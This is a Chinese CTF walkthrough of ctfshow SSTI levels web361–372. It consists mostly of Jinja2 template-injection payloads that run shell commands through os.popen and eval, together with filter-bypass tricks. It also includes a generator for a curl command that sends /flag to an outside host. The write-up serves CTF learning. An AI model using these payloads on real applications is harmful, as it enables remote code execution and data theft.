ctfshow-SSTI

news/2024/7/7 19:14:03 标签: python, 前端, 开发语言

SSTI

web361

payload:

?name={{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}

image-20220505233105314

?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

image-20220505233154996

之后打开

?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

image-20220505233237388

得到flag

web362

payload同上

image-20220505233600861

web363

题中过滤了引号

使用request.args绕过

如果要构造

?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

但是引号不能使用了,就可以把这两处使用引号的地方替换掉,最终变成

?name={{ config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag

也就是上面的 ‘os’ 可以写为 request.args.a&a=os

?name={{ config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag

image-20220505233830653

web364

此题在363关的基础上过滤了args

request.args是GET传参,可以使用其他方式来代替args,eg:cookie

?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}

Cookie:a=os;b=popen;c=cat /flag

image-20220505234039345

web365

过滤了中括号 [ ]

?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}

Cookie:a=cat /flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oBwjC1wI-1651924577482)(C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20220505234259135.png)]

web366

过滤了下划线"_"

这里用attr方法:request|attr(request.cookies.a)等价于request[“a”]

attr获取变量:

""|attr("__class__")
相当于
"".__class__

request.cookies传参

?name={{(abc|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c))(request.cookies.d).eval(request.cookies.e)}}

Cookie:a=__init__;b=__globals__;c=__getitem__;d=__builtins__;e=__import__('os').popen('cat /flag').read()

image-20220506160725170

web367

过滤了os

?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}

Cookie:a=__globals__;b=os;c=cat /flag

image-20220506161010670

web368

在上面的基础上过滤了{{

使用{%%}进行绕过,再借助print()回显

?name={% print((abc|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c))(request.cookies.d).eval(request.cookies.e))%}

Cookie:a=__init__;b=__globals__;c=__getitem__;d=__builtins__;e=__import__('os').popen('cat /flag').read()

image-20220506161540368

web369

request被禁用

?name={% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{%print(x.open(file).read())%}

 
构造po="pop"     #利用dict()|join拼接得到
{% set po=dict(po=a,p=a)|join%}
 
等效于a=(()|select|string|list).pop(24),即a等价于下划线_
{% set a=(()|select|string|list)|attr(po)(24)%}
 
构造ini="___init__"
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
 
构造glo="__globals__"
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
 
构造geti="__getitem__"
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
 
构造built="__builtins__"
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
 
调用chr()函数
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
 
构造file='/flag'
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}

原理是,给不同的变量赋值,然后拼接成我们想要的命令,原理参考SSTI模板注入绕过(进阶篇)。

{% set a=dict(o=oo,s=ss)|join %}

得到的a就是把这个字典的键名拼接后的值,即os,这样的拼接不需要用到单双引号。接下来,想办法把类似_这样的字符通过一系列操作找出来就可以了

如何得到_?

{% set a=(()|select|string|list)|attr(po)(24)%}

a=_

image-20220506161505342

web370

过滤了数字

?name=
{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set coun=(cc~cccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{%print(x.open(file).read())%}

分析如下
几个c就代表几,比如c=1,ccc=3

{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
用~拼接    构造coun=24
{% set coun=(cc~cccc)|int%}
同web369
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
调用chr()函数
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
构造file="/flag"
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}

image-20220506162049926

web371

过滤了print

?name={% set c=(t|count)%}
{% set cc=(dict(e=a)|join|count)%}
{% set ccc=(dict(ee=a)|join|count)%}
{% set cccc=(dict(eee=a)|join|count)%}
{% set ccccc=(dict(eeee=a)|join|count)%}
{% set cccccc=(dict(eeeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set ccccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|count)%}
{% set coun=(ccc~ccccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set cmd=
%}
{%if x.eval(cmd)%}
abc
{%endif%}

cmd后面的内容由下面的代码生成

def aaa(t):
	t='('+(int(t[:-1:])+1)*'c'+'~'+(int(t[-1])+1)*'c'+')|int'
	return t
s='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def ccchr(s):
	t=''
	for i in range(len(s)):
		if i<len(s)-1:
			t+='chr('+aaa(str(ord(s[i])))+')%2b'
		else:
			t+='chr('+aaa(str(ord(s[i])))+')'
	return t
print(ccchr(s))

web372

过滤了count,我们可以用length替换,也可以用全角数字代替正常数字

半角转全角代码

def half2full(half):  
    full = ''  
    for ch in half:  
        if ord(ch) in range(33, 127):  
            ch = chr(ord(ch) + 0xfee0)  
        elif ord(ch) == 32:  
            ch = chr(0x3000)  
        else:  
            pass  
        full += ch  
    return full  
t=''
s="0123456789"
for i in s:
    t+='\''+half2full(i)+'\','
print(t)

http://www.niftyadmin.cn/n/1621472.html

相关文章

ctfshow--node.js漏洞

ctfshow--node.js漏洞

一些漏洞&#xff1a; 危险函数所导致的命令执行 eval() eval() 函数可计算某个字符串&#xff0c;并执行其中的的 JavaScript 代码。和PHP中eval函数一样&#xff0c;如果传递到函数中的参数可控并且没有经过严格的过滤时&#xff0c;就会导致漏洞的出现。 简单例子&#…
阅读更多...
Vue 后台权限控制解决方案

Vue 后台权限控制解决方案

2019独角兽企业重金招聘Python工程师标准>>> Vue2.0用户权限控制解决方案 .Vue 手把手写后台 .基于 vue2 element-ui 构建的后台管理系统微人事是一个前后端分离的人力资源管理系统vueiview 动态路由和权限验证 .端框架iviewui使用示例之菜单多Tab页布局Vue2 后台管…
阅读更多...
ctfshow--xxe

ctfshow--xxe

xxe web373 查看源码&#xff1a; error_reporting(0); libxml_disable_entity_loader(false); $xmlfile file_get_contents(php://input); if(isset($xmlfile)){$dom new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_im…
阅读更多...
震惊!被这样开发的P2P分发下载技术

震惊!被这样开发的P2P分发下载技术

如果提起P2P分发技术的一些应用&#xff0c;你还是只能想到快播和网贷&#xff0c;那就真是OUT了。虽然大家对P2P褒贬不一&#xff0c;但都不可否认P2P分发技术是一项伟大的技术发明。这一项伟大发明从面世起在技术应用上也是经历了几代大起大落&#xff0c;认真观察过它应用领…
阅读更多...
WEB-ctfshow入门文件包含

WEB-ctfshow入门文件包含

web151 查看源码可以发现只能上传png图片 修改为php 修改上传格式为php&#xff0c;上传一句话马&#xff0c;蚁剑连接得flag web152 后端校验 上传一句话,png文件用burp抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php…
阅读更多...
利用SimpleMDE打造类似简书、掘金的markdown编辑器

利用SimpleMDE打造类似简书、掘金的markdown编辑器

最近在寻找适合web端的markdown编辑器&#xff0c;一直没有发现太合适的&#xff0c;直到发现 SimpleMDE&#xff0c;也可以直接在 Github上查看对应的说明信息&#xff0c; 安装 通过 npmnpm install simplemde --save 复制代码通过 bowerbower install simplemde --save 复制…
阅读更多...
这家伙很懒

这家伙很懒

这家伙很懒&#xff0c;开通CSDN账号几年了才写第一篇博文
阅读更多...
C语言字节对齐 __align(),__attribute((aligned (n))),#pragma pack(n)【转】

C语言字节对齐 __align(),__attribute((aligned (n))),#pragma pack(n)【转】

转自&#xff1a;https://www.cnblogs.com/ransn/p/5081198.html 转载地址 : http://blog.csdn.net/21aspnet/article/details/6729724 一、概念       对齐跟数据在内存中的位置有关。如果一个变量的内存地址正好位于它长度的整数倍&#xff0c;他就被称做自然对齐。比如在…
阅读更多...
最新文章

Copyright @ 2022~2023